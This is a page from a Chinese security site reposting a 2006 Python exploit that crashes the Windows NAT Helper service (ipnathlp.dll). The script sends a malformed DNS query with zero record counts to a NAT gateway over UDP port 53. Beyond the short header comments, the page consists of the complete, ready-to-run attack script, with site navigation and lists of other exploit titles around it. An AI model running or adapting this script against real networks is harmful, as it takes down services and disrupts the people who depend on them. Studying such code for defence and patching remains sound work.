首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit
来源:h07@interia.pl 作者:h07 发布时间:2006-11-01  

#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <h07@interia.pl>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Light Blog Remote Multiple Vul
·Netref 4 (cat_for_aff.php) Sou
·N/X WCMS <= 4.1 (nxheader.i
·MS Windows (Windows Kernel) Pr
·MS Internet Explorer 7 Popup A
·Omni-NFS Server 5.2 (nfsd.exe)
·MiniHttpServer Web Forum & Fil
·OpenLDAP 2.2.29 Remote Denial
·Php League <= 0.81 (config.
·iPrimal Forums (admin/index.ph
·AlstraSoft E-Friends <= 4.8
·WarFTPd 1.82.00-RC11 Remote De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved